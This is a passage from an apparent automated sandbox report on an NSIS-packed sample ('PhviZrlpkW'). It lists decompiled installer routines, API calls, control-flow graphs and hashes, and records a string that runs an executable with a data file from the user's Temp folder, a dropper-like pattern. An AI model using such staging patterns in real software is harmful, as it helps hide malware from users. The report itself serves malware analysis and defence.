                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$C:\Users\user\AppData\Local\Temp
                    • API String ID: 1941528284-311309491
                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                    C-Code - Quality: 100%
                    			E004069C5(intOrPtr _a4) {
                    				short _v576;
                    				signed int _t13;
                    				struct HINSTANCE__* _t17;
                    				signed int _t19;
                    				void* _t24;
                    
                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                    				if(_t13 > 0x104) {
                    					_t13 = 0;
                    				}
                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                    					_t19 = 1;
                    				} else {
                    					_t19 = 0;
                    				}
                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                    				return _t17;
                    			}









                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                    • wsprintfW.USER32 ref: 00406A17
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                    C-Code - Quality: 100%
                    			E00405B99(WCHAR* _a4) {
                    				struct _SECURITY_ATTRIBUTES _v16;
                    				struct _SECURITY_DESCRIPTOR _v36;
                    				int _t22;
                    				long _t23;
                    
                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                    				_v36.Owner = 0x4083f8;
                    				_v36.Group = 0x4083f8;
                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                    				_v16.lpSecurityDescriptor =  &_v36;
                    				_v36.Revision = 1;
                    				_v36.Control = 4;
                    				_v36.Dacl = 0x4083e8;
                    				_v16.nLength = 0xc;
                    				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                    				if(_t22 != 0) {
                    					L1:
                    					return 0;
                    				}
                    				_t23 = GetLastError();
                    				if(_t23 == 0xb7) {
                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                    						goto L1;
                    					}
                    					return GetLastError();
                    				}
                    				return _t23;
                    			}








                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                    • GetLastError.KERNEL32 ref: 00405BF0
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                    • GetLastError.KERNEL32 ref: 00405C0F
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-3081826266
                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                    C-Code - Quality: 93%
                    			E00403479(intOrPtr _a4) {
                    				intOrPtr _t11;
                    				signed int _t12;
                    				void* _t14;
                    				void* _t15;
                    				long _t16;
                    				void* _t18;
                    				intOrPtr _t31;
                    				intOrPtr _t34;
                    				intOrPtr _t36;
                    				void* _t37;
                    				intOrPtr _t49;
                    
                    				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                    				 *0x42a26c = GetTickCount() + 0x1f4;
                    				if(_t34 <= 0) {
                    					L22:
                    					E0040302E(1);
                    					return 0;
                    				}
                    				E004035F8( *0x420f04);
                    				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                    				 *0x420f00 = _t34;
                    				 *0x420ef0 = 0;
                    				while(1) {
                    					_t31 = 0x4000;
                    					_t11 =  *0x420ef8 -  *0x420f04;
                    					if(_t11 <= 0x4000) {
                    						_t31 = _t11;
                    					}
                    					_t12 = E004035E2(0x414ef0, _t31);
                    					if(_t12 == 0) {
                    						break;
                    					}
                    					 *0x420f04 =  *0x420f04 + _t31;
                    					 *0x40ce80 = 0x414ef0;
                    					 *0x40ce84 = _t31;
                    					L6:
                    					L6:
                    					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                    						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                    						E0040302E(0);
                    					}
                    					 *0x40ce88 = 0x40cef0;
                    					 *0x40ce8c = 0x8000; // executed
                    					_t14 = E00406BB0(0x40ce68); // executed
                    					if(_t14 < 0) {
                    						goto L20;
                    					}
                    					_t36 =  *0x40ce88; // 0x40e579
                    					_t37 = _t36 - 0x40cef0;
                    					if(_t37 == 0) {
                    						__eflags =  *0x40ce84; // 0x0
                    						if(__eflags != 0) {
                    							goto L20;
                    						}
                    						__eflags = _t31;
                    						if(_t31 == 0) {
                    							goto L20;
                    						}
                    						L16:
                    						_t16 =  *0x420ef4;
                    						if(_t16 -  *0x40ce60 + _a4 > 0) {
                    							continue;
                    						}
                    						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                    						goto L22;
                    					}
                    					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                    					if(_t18 == 0) {
                    						_push(0xfffffffe);
                    						L21:
                    						_pop(_t15);
                    						return _t15;
                    					}
                    					 *0x40ce60 =  *0x40ce60 + _t37;
                    					_t49 =  *0x40ce84; // 0x0
                    					if(_t49 != 0) {
                    						goto L6;
                    					}
                    					goto L16;
                    					L20:
                    					_push(0xfffffffd);
                    					goto L21;
                    				}
                    				return _t12 | 0xffffffff;
                    			}















                    APIs
                    • GetTickCount.KERNEL32 ref: 0040348D
                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FilePointer$CountTick
                    • String ID: y@
                    • API String ID: 1092082344-1430850693
                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                    C-Code - Quality: 100%
                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				intOrPtr _v8;
                    				short _v12;
                    				short _t12;
                    				intOrPtr _t13;
                    				signed int _t14;
                    				WCHAR* _t17;
                    				signed int _t19;
                    				signed short _t23;
                    				WCHAR* _t26;
                    
                    				_t26 = _a4;
                    				_t23 = 0x64;
                    				while(1) {
                    					_t12 =  *L"nsa"; // 0x73006e
                    					_t23 = _t23 - 1;
                    					_v12 = _t12;
                    					_t13 =  *0x40a5ac; // 0x61
                    					_v8 = _t13;
                    					_t14 = GetTickCount();
                    					_t19 = 0x1a;
                    					_v8 = _v8 + _t14 % _t19;
                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                    					if(_t17 != 0) {
                    						break;
                    					}
                    					if(_t23 != 0) {
                    						continue;
                    					} else {
                    						 *_t26 =  *_t26 & _t23;
                    					}
                    					L4:
                    					return _t17;
                    				}
                    				_t17 = _t26;
                    				goto L4;
                    			}













                    APIs
                    • GetTickCount.KERNEL32 ref: 004061A5
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-678247507
                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                    C-Code - Quality: 100%
                    			E00403C25() {
                    				void* _t1;
                    				void* _t2;
                    				void* _t4;
                    				signed int _t11;
                    
                    				_t1 =  *0x40a018; // 0xffffffff
                    				if(_t1 != 0xffffffff) {
                    					CloseHandle(_t1);
                    					 *0x40a018 =  *0x40a018 | 0xffffffff;
                    				}
                    				_t2 =  *0x40a01c; // 0xffffffff
                    				if(_t2 != 0xffffffff) {
                    					CloseHandle(_t2);
                    					 *0x40a01c =  *0x40a01c | 0xffffffff;
                    					_t11 =  *0x40a01c;
                    				}
                    				E00403C82();
                    				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nse83F2.tmp\\", 7); // executed
                    				return _t4;
                    			}








                    APIs
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                    • C:\Users\user\AppData\Local\Temp\nse83F2.tmp\, xrefs: 00403C5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse83F2.tmp\
                    • API String ID: 2962429428-242142104
                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 672 40603f-40605a call 406668 call 405fe2 677 406060-40606d call 4068ef 672->677 678 40605c-40605e 672->678 682 40607d-406081 677->682 683 40606f-406075 677->683 679 4060b8-4060ba 678->679 685 406097-4060a0 lstrlenW 682->685 683->678 684 406077-40607b 683->684 684->678 684->682 686 4060a2-4060b6 call 405f37 GetFileAttributesW 685->686 687 406083-40608a call 40699e 685->687 686->679 692 406091-406092 call 405f83 687->692 693 40608c-40608f 687->693 692->685 693->678 693->692
                    C-Code - Quality: 53%
                    			E0040603F(void* __eflags, intOrPtr _a4) {
                    				int _t11;
                    				signed char* _t12;
                    				long _t16;
                    				intOrPtr _t18;
                    				intOrPtr* _t21;
                    				signed int _t23;
                    
                    				E00406668(0x425f50, _a4);
                    				_t21 = E00405FE2(0x425f50);
                    				if(_t21 != 0) {
                    					E004068EF(_t21);
                    					if(( *0x42a278 & 0x00000080) == 0) {
                    						L5:
                    						_t23 = _t21 - 0x425f50 >> 1;
                    						while(1) {
                    							_t11 = lstrlenW(0x425f50);
                    							_push(0x425f50);
                    							if(_t11 <= _t23) {
                    								break;
                    							}
                    							_t12 = E0040699E();
                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                    								E00405F83(0x425f50);
                    								continue;
                    							} else {
                    								goto L1;
                    							}
                    						}
                    						E00405F37();
                    						_t16 = GetFileAttributesW(??); // executed
                    						return 0 | _t16 != 0xffffffff;
                    					}
                    					_t18 =  *_t21;
                    					if(_t18 == 0 || _t18 == 0x5c) {
                    						goto L1;
                    					} else {
                    						goto L5;
                    					}
                    				}
                    				L1:
                    				return 0;
                    			}










                    APIs
                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: P_B
                    • API String ID: 3248276644-906794629
                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 695 407194-40719a 696 40719c-40719e 695->696 697 40719f-4071bd 695->697 696->697 698 407490-40749d 697->698 699 4073cb-4073e0 697->699 702 4074c7-4074cb 698->702 700 4073e2-4073f8 699->700 701 4073fa-407410 699->701 703 407413-40741a 700->703 701->703 704 40752b-40753e 702->704 705 4074cd-4074ee 702->705 706 407441 703->706 707 40741c-407420 703->707 710 407447-40744d 704->710 708 4074f0-407505 705->708 709 407507-40751a 705->709 706->710 711 407426-40743e 707->711 712 4075cf-4075d9 707->712 713 40751d-407524 708->713 709->713 715 406bf2 710->715 716 4075fa 710->716 711->706 717 4075e5-4075f8 712->717 718 4074c4 713->718 719 407526 713->719 720 406bf9-406bfd 715->720 721 406d39-406d5a 715->721 722 406c9e-406ca2 715->722 723 406d0e-406d12 715->723 725 4075fd-407601 716->725 717->725 718->702 726 4074a9-4074c1 719->726 727 4075db 719->727 720->717 728 406c03-406c10 720->728 721->699 731 406ca8-406cc1 722->731 732 40754e-407558 722->732 729 406d18-406d2c 723->729 730 40755d-407567 723->730 726->718 727->717 728->716 733 406c16-406c5c 728->733 734 406d2f-406d37 729->734 730->717 735 406cc4-406cc8 731->735 732->717 736 406c84-406c86 733->736 737 406c5e-406c62 733->737 734->721 734->723 735->722 738 406cca-406cd0 735->738 743 406c94-406c9c 736->743 744 406c88-406c92 736->744 741 406c64-406c67 GlobalFree 737->741 742 406c6d-406c7b GlobalAlloc 737->742 739 406cd2-406cd9 738->739 740 406cfa-406d0c 738->740 745 406ce4-406cf4 GlobalAlloc 739->745 746 406cdb-406cde GlobalFree 739->746 740->734 741->742 742->716 747 406c81 742->747 743->735 744->743 744->744 745->716 745->740 746->745 747->736
                    C-Code - Quality: 99%
                    			E00407194() {
                    				signed int _t530;
                    				void _t537;
                    				signed int _t538;
                    				signed int _t539;
                    				unsigned short _t569;
                    				signed int _t579;
                    				signed int _t607;
                    				void* _t627;
                    				signed int _t628;
                    				signed int _t635;
                    				signed int* _t643;
                    				void* _t644;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					_t530 =  *(_t644 - 0x30);
                    					if(_t530 >= 4) {
                    					}
                    					 *(_t644 - 0x40) = 6;
                    					 *(_t644 - 0x7c) = 0x19;
                    					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                    					while(1) {
                    						L145:
                    						 *(_t644 - 0x50) = 1;
                    						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    						while(1) {
                    							L149:
                    							if( *(_t644 - 0x48) <= 0) {
                    								goto L155;
                    							}
                    							L150:
                    							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                    							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                    							 *(_t644 - 0x54) = _t643;
                    							_t569 =  *_t643;
                    							_t635 = _t569 & 0x0000ffff;
                    							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                    							if( *(_t644 - 0xc) >= _t607) {
                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                    								_t628 = _t627 + 1;
                    								 *_t643 = _t569 - (_t569 >> 5);
                    								 *(_t644 - 0x50) = _t628;
                    							} else {
                    								 *(_t644 - 0x10) = _t607;
                    								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                    								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                    							}
                    							if( *(_t644 - 0x10) >= 0x1000000) {
                    								L148:
                    								_t487 = _t644 - 0x48;
